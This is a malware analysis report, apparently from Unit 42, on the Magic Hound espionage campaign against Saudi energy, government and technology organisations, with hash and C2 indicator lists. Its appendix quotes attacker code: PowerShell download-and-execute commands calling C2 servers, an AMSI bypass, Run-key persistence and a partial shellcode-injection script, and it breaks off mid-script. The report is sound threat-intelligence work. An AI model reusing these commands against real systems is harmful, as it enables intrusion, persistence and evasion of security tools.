71c5b899a5187baeb8f605ca39ca56bf05a63025a8f9f84c45590d8345e5d349
725b7d92ed66be160f2e04395008a65c72814d5ddf842d9778396f6c6679d85e
72d4b780a90ede7ea152f5da0973965cab31d2813fa8c2fe0e1cb611f5ca257e
73670d06851f588c7df44dc478f49883406697c48c618438e0f249b7a916552e
74e017853fbc85ee77ca7476cd25423815602aaaa02b29e0003c95c9551b8890
75d2367dc79d9f8aed165729df90ed5d28fefe267778dbe4d3d74aafa75d66e0
7a5a1c6ea0c2f017df9f06975c93a356cac20b19031fcde96136fa5881e5ef3a
7adb049e0b49312aea904c70e16d0e7f03d01aae4bf8ac867e8219ced4e6e057
7bfa85bec239b6c4419b2d57149c5960263c80e493f888d03ceaaa3f945b1b25
7f324b658f587b3b27921ebeba5ac25aebd669b33e6801fa9581de8c2eb0df2e
7fee970748eb83045e36911dafdaee0d4069ebe72c059cc7de3d65539012c2e9
823793a37d748ffe708864c16c853c67a5db812712481da1d24790b455163940
8512aabfa0175684bdbb77481d6b272b63dbc4249b04a44e1003b7d8fdea0a89
86c81f03cf7d8f8af38c2559dbf506cccdc25579f3b29fb574f823a67f99a0a3
88ae7e60b9dd57fc6b2d667ce33fb29c0f75d37eb7c837ccf56cb7994386d5ef
8b50e3ca06a22d0be6a71232b320137c776f80ac3f2c81b7440b43854b8a3bf0
8bd40e7fe6bbd4d5810db2c142186bb58da445a132fb6f9ff01c46947a532244
8c9d690e765c7656152ad980edd2200b81d2afceef882ed81287fe212249f845
8d38726d674279705fe06b4b45bbbaef10756c547d560cea6998e23dba09f80c
8db47439685edc683765abb5e6d7d0d05479bf9ee164992db9e8ce97fe43ee2f
95de2e16f1b05d1b45b1d182c1503568c2e5fd4a81ac52fe1bc9e881d1a272b1
95e3204228341852b7c97f357f799e7ec9688abe1262436b569e56397f1fd864
98caf00760d772598386eb8d4f26caf92fb891915ac08da6bf830be5e45278d3
99c9440a84cdc428ce140de901452eb334faec49f1f6258acdde1ddcbb34376e
9a8776e4ae38cf529bab28947b31ade84301262b7996dc37ec47afa4fb4cf6e1
9beb1d2a03ff2d4c15913de0f87b72074155b44df791bd967dac8155e97a0e06
9c8d518fbbc8cbb25fa309f5396efa5749e57a3b0158779404c8d3e92baf6596
a064a28e5e7409a96bba93fc57f44cadc3492bb0f49792c89c973e30b0f5d498
a194b47043356fa365d98a5f7c582b6f87fac90acf0f469ed3651cfe2fd7b2c9
a21dfb8e8b7c8dfbeeb4d72e6ef1f22c667b8968b3a3b1dcce99f44faab05903
a2e0fe2d385dabcdfb024100216d259ddd1fa9907e982d297846fd29b8d4d415
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
a595da9a2fa58d4f8be0bfbcf7f4c950435ff5289dd1ccf2c65eec73a0afe97f
a972ad0ddc00d5c04d9fe26f1748e12008efdd6524c9d2ea4e6c2d3e42d82b7b
aa860d405746401ae4155485326fdeb39718832c77c73540d48f4fbb8e596215
ab6832a4432b4bdaec0706f7b00a369c48175eac9abc3e537032b1f5d26a993b
ada2f0703614b3447d427827777af5d4ee9ffe9179498970326926751a4f8d65
b16d317c11228bd3573126a0e1bc0bbf35d84a4a1f47dfb06b70634a21fd9823
b3665548cc0f2fce3593fb7139f49588faa1d327b6d23feb564ca4194053ae8a
b5578c48a11533871ae91e6d5632aafc25d3976c0626d62abab306663566d024
b67a6f87fc3fd7c5c3666acac5918c8c08a53ab6a966f4d1daf38105a566ede1
b6abc8ab631dcf52e028ab26dbe3bb94022d69193c0acc8642cbd6329cbb23ef
b7e117eb342b0d450095805073326989c792bf5ccbbdcd5f4a9ace50e517412e
bb14abc9b0798c7756a6ed887308a3e6210cc08a5149dc1360fdd1f5bca27cca
bdadb319f071f02462d107380102b669e407bb2a0b20e77a9a8a5726b4cbbc4b
bf2383cfbee4cbb0bda2614839454ab1724c9bbfff8b4b48e0f48579ae220c10
bf52b44168de1855d83186163a2d5f29e488ddafdfd5447e211aec4a769cf74a
c0d5cf7a0035deda5646aaf520b3ff632aa6be76ddbc88f38ddc11e77ffb40b4
c1a82a788df7418712664138c0fdb05232036a27ab0998479d60c656998849f1
c63a523834ab59ab5621a0acb156a9b901befe806044642fe5fec8a0ba545e70
12/13
d05d3f3582e13eaf5f39d7143ca1a4b1367cc5267bf9958a15e27cf53e059518
d0e456cff03c2483ded9a0f8c1b99f9fefb6ba47dcaf949dae27abe940ee20e6
d8a01f69840c07ace6ae33e2f76e832c22d4513c07e252b6730b6de51c2e4385
dada74663e3e29ee26bfd03a888f0bda9fc81e148511fa98f73f8e8a915933cc
db3ffcbf136e0268ec66f28b30fa8ba350f74e02e8e737e61cc6ef8d8258027e
dd26b85b6568595b1d2bbc47ce47d071ede75665fbd779d637b74663ead5539e
df9038660164623a827a8119d4cb3d71d0a5288b12bdfdd32c72769bf90a9ea0
dfed16e9184a86e6fcd17a98f127410840d058db667e9975b43add100c33122e
e0063d2524a89159cf5da12661225fbb27725bbd72acd9497b7207ecf2f3aeb6
e00c55ddda9cbb82fb47924fafdf40c3394dc1127d9901c71a69ef3ef664b817
e14a51d69211948163ab20b0cc68adf410bb821f2890f55d2d202c745f4ec1b8
e2e3f243bbcad666852e64202d35f6dd88c58f5d24435d92975697b0efa8a775
e37e25739e8bc4620d9d37d8f6b400cd82c85b89d206436ba35930ed96db6eb0
e55b5ede808b6d491f18737d6a1cf34b5178f02e9ea01d7cff31a449888dbd73
ed28d9207acac2afff817eaa56d1599422e23946dffa4f8bade376d52a6af7d4
eda0853e814ee31a66c3b42af45cd66019ffd61eac30e97bd34c27d79253a1bb
f1b3e58d060803b0ff6008386bab47fb8099ac75ee74f385ac34340a28bf716e
f2091f71227180d74ba1ba4607635e623553b1826314dca91cb31839eb00c4ea
f214d55ccb5db5edbaafe7d40b240c79f04c70d441adee01ef438f776eb37037
f571ddc894915dee136cf24731ff3d79fe4f811b112d122a34a128628cb43c4a
f7676d2a28992a382475af2ae0abca4794e1397ef3327f30f7d4cbdbc2ca0a68
f8e20894c8c18d79e80b431008aa8bef46cc10a355a4934f9cc40ffd637b8890
fa1bf7565352099b74624c8beeff6620411e1efe00e54f8b4190f69e243d5811
fa784f69265ebe5e150cf5956a40d86335d1a5edc57fffcc7ce6eedc591c2751
13/13
Magic Hound Campaign Attacks Saudi Targets
researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/
By Bryan Lee and Robert Falcone
2/16/2017
Unit 42 has discovered a persistent attack campaign operating primarily in the Middle East dating back to at least mid-2016 which we have named Magic Hound. This appears to be an
attack campaign focused on espionage. Based upon our visibility it has primarily targeted organizations in the energy, government, and technology sectors that are either based or have
business interests in Saudi Arabia. The adversaries appear to have evolved their tactics and techniques throughout the tracked time-period, iterating through a diverse toolset across
different waves of attacks. Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called
Rocket Kitten
(AKA
Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters. Artifacts of this campaign was also recently published
by Secureworks CTU.
We were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat intelligence tool. The earliest malware sample we were able to
collect had a compile timestamp in May 2016. The samples themselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others. It is believed the
use of specific tools may have coincided with specific attack waves by this adversary, with the most recent attacks using weaponized Microsoft Office documents with malicious macros.
Due to the large amount of data collected, and limitations on attack telemetry, this blog will focus primarily on the most recent attacks occurring in the latter half of 2016.
ATTACK DETAILS
The samples initially collected and associated with Magic Hound were Microsoft Word and Excel documents containing embedded malicious macros. We were able to expand our data set
by pivoting on infrastructure and tool behavior, which uncovered additional types of tools in use by Magic Hound, such as regular portable executable (PE) payloads, PE files compiled in
.NET Framework, various forms of IRC bots, and an open source file-less Python remote access tool called Pupy.
The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate
domain names in appearance. The two legitimate websites we were able to identify were owned by organizations in the government and energy sectors. Based on the existence of these
malicious files on the legitimate websites, it is highly probable that the websites had already been compromised in some fashion. At the time of investigation, the files had already been
removed from the websites. The two other delivery sites were ntg-sa[.]com, which may be trying to spoof a Saudi based information and communication technology conglomerate and
mol.com-ho[.]me, which may be trying to spoof the Ministry of Labor. A third delivery site was identified at its.com-ho[.]me which may appear to be a benign domain.
Several of these documents were also found on a seemingly unrelated, but benign-looking domain, briefl[.]ink.
It is highly likely the adversary then used spear-phishing attacks containing links to these malicious documents as a delivery mechanism. We were ultimately able to identify multiple
organizations in the government, energy, and technology sectors targeted by Magic Hound.
The weaponized documents themselves all contained malicious macros which were designed to call Windows PowerShell to retrieve additional tools. A handful of lures with different
themes were used repeatedly with variations throughout the eighteen collected documents. They ranged from documents masquerading as official Saudi government forms to a holiday
greetings card. The forms masquerading as official government documents specifically used imagery from the Ministry of Health and the Ministry of Commerce claiming to be mandatory
forms that required macros to be enabled. Examples of the documents can be seen below:
1/19
2/19
INFRASTRUCTURE
Analysis of the weaponized documents revealed some peculiarities right away. The majority of documents used the name
gerry knight
for the author field in the document metadata, and
the embedded macros largely used direct IP connections to command and control (C2) servers rather than using domain names. These C2 servers also appeared to lack any
relationships to each other and were hosted on a variety of VPS providers. Two of the Word documents using the
gerry knight
author name however were found to be communicating to
C2 servers on two specific domains, www1.chrome-up[.]date and www3.chrome-up[.]date. Using these domains as pivot points, we were able to expand our data set. As seen below, the
relational analysis proved to be quite fruitful:
3/19
Figure 1 Overview of relationships
We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain
variations of chrome-up[.]date as seen in the following graphic:
4/19
Figure 2 Command and control overlaps
From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads. What initially appeared as a
disparate and segregated attack campaign appeared very rapidly to be a persistent and prolonged attack campaign with very specific goals in mind.
In total, we were able to collect over fifty different samples via infrastructure reuse, behavioral matching, and the reuse of a specific file for maintaining persistence. These tools included
Microsoft Office documents, portable executables (PE), .NET Framework PE files, Meterpreter, IRC bots, an open sourced Meterpreter module called Magic Unicorn, and an open
sourced Python RAT called Pupy.
Interestingly as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different
IRC bot called MPK.
Figure 3 Rocket Kitten and Magic Hound infrastructure overlap
The MPK bot is not publicly available and had previously been attributed to an adversary group called
Rocket Kitten
which has often been thought to be a state sponsored adversary
operating in the Middle East region. Although the likelihood of two different adversaries focused on espionage operating in the same geographical region using one specific IP and not
being related somehow is fairly slim, due to limited telemetry, we lack additional corroborating evidence of a conclusive relationship.
MAGIC HOUND TOOLSET
The Magic Hound attacks did not rely on exploit code to compromise targeted systems, instead relying on executables and Microsoft Office documents, specifically Excel and Word
5/19
documents containing malicious macros. During our analysis, we were able to determine the ultimate payload for several of these attacks. One payload was a Python based open source
remote administration tool (RAT) called Pupy. A second payload was an IRC bot we have named MagicHound.Leash. We have also seen this group use the Magic Unicorn module to
generate a PowerShell script to deliver a shellcode-based payload. While we have not been able to obtain a secondary payload from the Unicorn generated PowerShell script, we believe
that this group uses the script to deliver Metasploit
s Meterpreter as a potential payload as well.
We have categorized the custom tools in use by the Magic Hound campaign into five categories, with corresponding names in Table 1. Additional details for these tools may be found in
the appendix.
TYPE
NAME
Dropper
MagicHound.DropIt
Executable Loader
MagicHound.Fetch
Document Loader
MagicHound.Rollover
Downloader
MagicHound.Retriever
IRC Bot
MagicHound.Leash
Table 1 Types of MagicHound tools and their Corresponding Names
MAGICHOUND.ROLLOVER
The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method, specifically attempting to load either the Pupy RAT or meterpreter which
we have called MagicHound.Rollover. The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server. We discovered
two different techniques used in the PowerShell scripts, the first being a straightforward execute command of a string retrieved from the remote server. The second technique appeared to
be from a tool called Magic Unicorn, an open source module for meterpreter. Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn
containing the comment
one line shellcode injection with native x86 shellcode
MAGICHOUND.FETCH
In addition to loading payloads using macros within delivery documents, we observed the Magic Hound campaign using executables to load secondary payloads from a remote server.
Both a custom developed loader, which we have named MagicHound.Fetch, as well as the default loader that comes with Pupy were found to be in use. The Fetch loader allowed us to
use attributes within the loader to uncover more tools used by this group, which included a backdoor and an IRC bot.
Fetch first attempts to create persistent access to the targeted host then retrieve a secondary payload from a remote server. To set up persistence, the loader writes a file to
c:\temp\rr.exe
and executes it with specific command line arguments to create auto run registry keys. All Fetch samples drop the same exact executable to set up persistence.
Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES. However, they all used the same key
agkrhfpdbvhdhrkj
. The loader
s main goal was to run a PowerShell command to execute shellcode. We found the PowerShell command used by Fetch within the source code of Magic
Unicorn, which was also used in the Magic Hound delivery documents. The shellcode executed by this PowerShell is the exact same as in the delivery documents, using code from
Metasploit which can obtain additional shellcode to execute using an HTTP request to the following URL:
http://www7.chrome-up[.]date/0m5EE
We were not able to retrieve the shellcode hosted at this URL. However, as alluded to above, we believe that this adversary used the open source Magic Unicorn tool to load a shellcodebased payload which is likely to be meterpreter.
PUPY LOADER
The Pupy RAT comes packaged by default with loaders that can run the RAT on a variety of platforms such as Windows, macOS, Linux and Android. We have seen the Magic Hound
campaign use both the 32-bit and 64-bit DLL loaders that come with Pupy to infect Windows systems. Analysis of their configurations show that the C2 servers used both fully-qualified
domain names and IP addresses. Also, the configurations show the use of the
obfs3
(The Threebfuscator) transport, which is an obfuscation method to hide the true TCP-based
communications protocol. The
obfs3
is used in the Tor project and the specifics of this transport can be found at the Tor Project.
MAGICHOUND.DROPIT
The Magic Hound campaign was also discovered using a custom dropper tool, which we have named MagicHound.DropIt. The DropIt Trojan we analyzed is an executable that builds
another executable by decoding embedded blobs of base64 encoded data and concatenating them together in the correct order. In all of the DropIt samples we collected, the dropper then
saves the executable to the user
s %TEMP% folder and executes the file.
We have also seen Magic Hound using DropIt as a binder, specifically dropping a legitimate decoy executable along with the malicious executable onto the target host. The legitimate
decoy executable and the malicious executable are then both executed, but with the malicious file running in the background and the decoy presented to the user. These types of tactics
are generally used for evasion and to not trigger and suspicion from the victim. In one example, the decoy executable was a legitimate Flash installer, therefore from the victim
perspective, they would experience the expected behavior of a Flash installer.
MAGICHOUND.RETRIEVER
We observed a DropIt sample installing another Trojan we call MagicHound.Retriever. At a high level, Retriever is a .NET downloader that retrieves secondary payloads using an
embedded URL in its configuration as the C2. Retriever uses .NET web services and the SoapHttpClientProtocol class to communicate with its C2 server, which generates HTTP requests
resembling the example request in Figure 4.
6/19
Figure 4 Retriever HTTP request sent to its C2 server
MAGICHOUND.LEASH
The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample
installing a backdoor Trojan that used IRC for its C2 communications.
Leash obtains its commands via private messages (PRIVMSG) sent from the adversary who must also be connected to the IRC server. All of its available commands (see Appendix),
except for the VER command seen in Figure 5, must be issued by individuals in the IRC channel with nicknames that start with
or
Figure 5 Lecash bot responding to VER command
There are a great deal of similarities between the IRC bot originally discussed in iSight
s NEWSCASTER whitepaper and LEASH. iSight
s whitepaper provided details on an IRC bot,
which some refer to as Parastoo based on the password used to join the IRC channel, as seen in the following network traffic generated when attempting to connect to the C2:
Parastoo Trojan
MagicHound.Leash
USER AS_ # # :des
USER AS_a # # :des
NICK t__982
NICK Conroy
JOIN :#tistani Parastoo
JOIN :#kalk
Performing a binary diff revealed a 67% similarity between the Leash and Parastoo samples. In addition to sharing significant portions of code, both of the IRC bots require an IRC user
nickname to start with either
or
to run commands on the system. Also, the two bots have similar responses to
commands seen in Figure 6 below, which differ slightly
from the responses seen generated by Leash.
7/19
Figure 6 Parastoo Trojan responding to commands in similar manner to Leash
MPKBot
We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on. This MPK IRC bot is very similar to the MPK Trojan that used a
custom C2 communications protocol, as detailed in a whitepaper by CheckPoint regarding a threat group called Rocket Kitten. We believe this version of the MPK Trojan is based on the
same code base, as both the IRC version and the one referenced in the white paper have considerable similarities from a behavior standpoint as well as direct code overlap.
CONCLUSION
The Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region. Organizations in the government, energy, and
technology sectors have been targeted by this adversary, specifically organizations based in or doing business in Saudi Arabia. The toolset used by the Magic Hound campaign was an
assortment of custom tools, as well as open sourced tools available to the general public. None of the tools we uncovered were found to be exploit-driven, and relied exclusively on social
engineering tactics to compromise targets. While we did discover a potential relationship with the Rocket Kitten adversary group, we cannot confirm the extent of that relationship at this
time, although we will continue to monitor the activities of Magic Hound.
Palo Alto Networks customers are protected via the following:
WildFire identification and detection of malicious samples
Command and control servers are classified as malicious
AutoFocus tags have been created
Magic Hound
MagicHound DropIt
MagicHound Fetch
MagicHound Retriever
MagicHound Rollover
MagicHound Leash
MagicHound MPKBot
PuPYRAT
INDICATORS OF COMPROMISE
MagicHound.DropIt SHA256
c21074f340665935e6afe2a972c8d1ab517954e2dd05cc73e5ff0e8df587b99d
ea139a73f8ec75ea60dfa87027c7c3ef4ed61b45e1acb5d1650cc54e658984ba
da2abdc951e4b2272fea5c8989debd22e26350bab4b4219104bccec5b8a7ff5a
0d3ae682868cb3ff069ec52e1ffc5ef765453fd78e47b6366d96aebb09afd8ab
f0ecc4388f0d84501499711681a64a74c5d95e0bb6a2174cbe3744bd5a456396
860f4cd44371a180a99bc16526f54f8b051c420a3df334d05d569d0cdadac3d2
b42b1186211633c2d47f3d815f0371ba234fee2ed0f26e487badc58e1ab81061
4beee6e7aa244335e161fdc05296ea100090c2114b4ff2e782e3ee3e1f936fdf
5e0e09c9860b293c4c9a2382a7392963adc54d6a23440abb9a2d89c50f8fd305
3161f9087d89a2d036ea32741d5a006c6bb279d36ff8d1acde63f2e354f8c502
MagicHound.Fetch PE SHA256
b6c159cad5a867895fd41c103455cebd361fc32d047b573321280b1451bf151c
8/19
6a7537f2cedbf453114cfba086e4746e698713777fb4fa4fc8964247dde741ed
16d87fbd8667677da1af5433b6d797438f8dc0ab565fb40ecb29f83f148888cd
92bc7d04445cf67aa7ddf15792cd62778d2d774d06616d1986f4c389b3d463f5
86d3409c908f667dd298b6a7e1e17652bb29af73e7daed4a5e945fbdf742e9f4
c3a8f5176351e87d28f45e58c79bb6646bb5d94ade7a24c6556514c860004143
a390365ddfcce146a8fa8435022f19b9a1be29f2b11a049cb660ec53f36beb06
d2ffc757a12817e4b58b3d58d71da951b177dedd3f65ca41fad04a03fc63fac6
79c9894b50cde62b182bd1560060c5c2bf5a1cef2b8afdffc4766e8c55ff6932
2f7f3582504fbce349a6991fbb3b5f9577c5c014b6ce889b80d51977fa6fb31a
8c2e4aa8d73ad2e48d70dfa18abea62769c7bef59c8c1607720f4f6162413f75
abe8e86b787998a07411ee24f3f3d8a79e37c6da539650ceed566b081f968c26
9e4d2e983f8a807f741f8873e6fa5d222dc6f3b358ccfc3a6c700398b342f656
e57f77cc3d117923ec01aa0e044edc11b1042e57993ca7f74d971630893ca263
ca6e823dedd6ca5fada2b1fa63d0acb288027f5a3cdd2c60dcace3c424c5ced0
eaaecabb439c81e522d9f5681fdb047ee62381e763f0d9646e68cd507479ba5a
1c3e527e496c4b0594a403d6d582bc6db3029d27369720d0d5122f862b10d8f1
29a659fb0ef0262e4de0dc3c6a140677b6ddee13c1819b791bd280be0547e309
MagicHound.Fetch PE C2
service.chrome-up[.]date
www3.chrome-up[.]date
www7.chrome-up[.]date
timezone[.]live
service1.chrome-up[.]date
104.238.184[.]252
www5.chrome-up[.]date
servicesystem.serveirc[.]com
MagicHound.Fetch DOC SHA256
218fac3d0639c0d762fcf71685bcf6b64c33d1533df03b4cf223d9b07ca1e3c2
e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6
71e584e7e1fb3cf2689f549192fe3a82fd4cd8ee7c42c15d736ebad47b028087
388b26e22f75a723ce69ad820b61dd8b75e260d3c61d74ff21d2073c56ea565d
33ee8a57e142e752a9c8960c4f38b5d3ff82bf17ec060e4114f5b15d22aa902e
5469facc266d5582bd387d69032a91c8fff373213b66a2f0852666e72bcdc1da
528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
66d24a529308d8ab7b27ddd43a6c2db84107b831257efb664044ec4437f9487b
cfce4827106c79a81eef6d3a0618c90bf5f15936036873573db76bed7e8a0864
68db2b363a88b061cc9063535f3920673f1f08d985b14cb52b898ced6c0f8964
e837f6b814c09900726dac2cf55f41babf361152875ba2a765a34ee5cc496087
f912d40de9fe9a726448c1d84dfba2d4941f57210b2dbc035f5d34d68e8ac143
af0ae0fa877f921d198239b7c722e12d14b2aa32fdfadaa37b47f558ae366de9
6d1a50ca3e80442fa3e2caca86c166ed60bef32c2d0af7352cd227303cdec031
MagicHound.Fetch DOC C2
45.76.128[.]165
9/19
139.59.46[.]154
104.218.120[.]128
89.107.62[.]39
69.87.223[.]26
analytics-google[.]org
89.107.60[.]11
www3.chrome-up[.]date
www.microsoftsubsystem.com-adm[.]in
www1.chrome-up[.]date
MagicHound.Fetch XLS SHA256
6c195ea18c05bbf091f09873ed9cd533ec7c8de7a831b85690e48290b579634b
97943739ccf8a00036dd3cdd0ba48e17a82ab9b65cc22c17c6e6258e72bb9ade
MagicHound.Fetch XLS C2
45.76.128[.]165
139.59.46[.]154
Pupy Loaders SHA256
7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73
db453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f
82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190
Pupy Loaders C2
139.59.46[.]154
www1.chrome-up[.]date
MagicHound.Retriever SHA256
1c550dc73b7a39b0cd21d3de7e6c26ece156253ac96f032efc0e7fcc6bc872ce
7cdbf5c035a64cb6c7ee8c204ad42b4a507b1fde5e6708ea2486942d0d358823
b2ea3fcd2bc493a5ac86e47029b076716ed22ef4487f9090f4aa1923a48015d6
3f23972a0e80983351bedf6ad45ac8cd63669d3f1c76f8834c129a9e0418fff1
MagicHound.Retriever C2
service.chrome-up[.]date
msservice[.]site
microsoftexplorerservices[.]cloud
MagicHound.Leash SHA256
133959be8313a372f7a8d95762722a6ca02bc30aaffde0cbcf6ba402426d02f5
ba3560d3c789984ca29d80f0a2ea38a224e776087e0f28104569630f870adaf4
d8731a94d17e0740184910ec81ba703bad5ff7afc92ba056f200533f668e07bf
MagicHound.Leash C2
45.56.123[.]129
syn.timezone[.]live
10/19
MPKBot SHA256
d08d737fa59edbea4568100cf83cff7bf930087aaa640f1b4edf48eea4e07b19
MPKBot C2
45.58.37[.]142
Appendix
MAGICHOUND.ROLLOVER
The Magic Hound campaign used Word and Excel documents as a delivery method, specifically documents that contain a malicious macro that attempts to load either the Pupy RAT or
possibly Meterpreter. We call this tool MagicHound.Rollover. In one example, the Word document contained a button with the label
First click
Enable Content
above the page, then click
here to fill out the form
This string attempts to trick the user into enabling macros to execute the malicious code within the macro. When the macro executes, it unhides a table that contains the contents of a
legitimate document in an attempt to make the user less suspicious of the malicious activities occurring in the background. The macro contains malicious code that attempts to download
content from a remote server.
The macro uses PowerShell to download a shellcode-based payload from a remote server using one of two available techniques. The first technique is rather straightforward, using
PowerShell
function to execute a string obtained from a remote server. The macro carries out this first technique by running the following command:
powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('hxxp://139.59.46.154:3485/eiloShaegae1')"
The code above generates the following HTTP request, which the C2 server would then respond to with a script that PowerShell would execute:
GET /eiloShaegae1 HTTP/1.1
Host: 139.59.46[.]154:3485
Connection: Keep-Alive
The second method involves using PowerShell to create a thread to execute a buffer of shellcode, which we believe the threat actors obtained from the Magic Unicorn source code. The
Unicorn source code contains a comment for this specific PowerShell command, which is described as a
one line shellcode injection with native x86 shellcode
The shellcode begins with a stub that is responsible for decrypting additional shellcode. To decrypt the additional shellcode, the stub code will start with an initial key, such as 0x6CAF9362
and XOR the first DWORD of the additional shellcode. It will then add the resulting DWORD to the key that the stub code will use to decrypt the second DWORD and so on. After we
decrypted the additional shellcode, we determined that the functional shellcode is part of the Metasploit Framework, specifically using the block_api.asm code to resolve API function
names and the block_reverse_http.asm code to obtain additional shellcode to execute on the system. The assembly code used to create the shellcode can be obtained from:
https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
The purpose of the shellcode is to obtain additional shellcode to execute using an HTTP request to the URL
hxxp://45.76.128[.]165:4443/0w0O6
. We are unsure of the shellcode hosted
at this URL, but it is possible that additional shellcode-based payloads like Meterpreter could have been served by this shellcode.
Two Rollover delivery documents (SHA256: 6c195ea18c05bbf091f09873ed9cd533ec7c8de7a831b85690e48290b579634b and SHA256:
218fac3d0639c0d762fcf71685bcf6b64c33d1533df03b4cf223d9b07ca1e3c2) attempted to communicate with the URL hxxp://139.59.46[.]154:3485/eiloShaegae1 to obtain additional code
to execute. On January 1, 2017, we observed this URL responding to the above HTTP request with the following data:
powershell.exe -exec bypass -window hidden -noni -nop -encoded
JABjAG8AbQBtAGEAbgBkACAAPQAgACcAVwB3AEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAE0AQQBaAFEAQgB5AEEASABZAEEAYQBRAEIAagBBAEcAVQBBAFUAQQBCAHYAQ
As you can see, the C2 server responds with a PowerShell command that will run on the system. The PowerShell command decodes to the following:
11/19
$command =
'WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhA
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
$exec = $Env:windir + '\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command
IEX $exec
else
$exec = [System.Convert]::FromBase64String($command)
$exec = [Text.Encoding]::Unicode.GetString($exec)
IEX $exec
The script above checks the system architecture to determine if it is an x64 machine and attempts to execute a base64 encoded command that decodes to the following:
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
IEX (New-Object Net.WebClient).DownloadString('http:// 139.59.46[.]154:3485 /IMo8oosieVai');
This decoded PowerShell script attempts to download and execute a file using HTTP from the URL
hxxp:// 139.59.46[.]154:3485 /IMo8oosieVai
. The C2 server will respond to this HTTP
GET request with a large amount of data that includes a PowerShell script that also contains a DLL payload that is embedded as a series of base64 encoded chunks, that is then decoded
using the following code:
$PEBytesTotal =
[System.Convert]::FromBase64String($PEBytes0+$PEBytes1+$PEBytes2+$PEBytes3+$PEBytes4+$PEBytes5+$PEBytes6+$PEBytes7+$PEBytes8+$PEBytes9+$PEBytes10+$PEBytes11
The PowerShell script loads the DLL payload directly into memory without saving it to the disk. The Pupy payload was generated using the following configuration, which shows the C2
IP/port and the use of the
obfs3
transport:
LAUNCHER_ARGS=['--host', '139.59.46[.]154:3543', '-t', 'obfs3']
It appears the adversary used a majority of the following Pupy module to create the PowerShell commands used in the delivery documents:
https://github.com/n1nj4sec/Pupy/blob/master/Pupy/Pupylib/payloads/ps1_oneliner.py
MAGICHOUND.FETCH
The custom loader Trojan used by this group, which we call MagicHound.Fetch is responsible for setting up persistent access to the system and to reach out to a remote server to
download and execute a secondary payload. To set up persistence, the loader creates a folder named
c:\temp
, sets its attributes to be a hidden and system folder to hide the folder from
view in Windows Explorer. It then writes a file named
rr.exe
(SHA256: f439dee4210d623b5aa7491bad8e8d9b43305f25a5d26940eb36f6460215cf8e) to this folder and executes it with
specific command line arguments. During our analysis, we observed one loader running
rr.exe
with the following arguments:
open cmd.exe /c c:\\temp\\rr.exe SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\spp.exe" iexplore
The
rr.exe
payload dropped to the system does nothing more than use the supplied command line arguments to create a registry key to execute the payload each time the system starts.
In the example above, the
spp.exe
executable would be added to an auto-run registry key at:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iexplore
Many of the Fetch samples attempted to obfuscate their functionality by encrypting their embedded strings with AES using the same key
agkrhfpdbvhdhrkj
; however, the loader
s main
goal involved running the following command:
/c powershell -window hidden -EncodedCommand
JAAwAG8AOABlACAAPQAgACcAJABmADkAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGM
The base64 encoded command decodes to the following:
$0o8e = '$f9B = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $f9B -Name "Win32" -namespace Win32Functions passthru;[Byte[]];[Byte[]]$z = ;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$rJr=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le
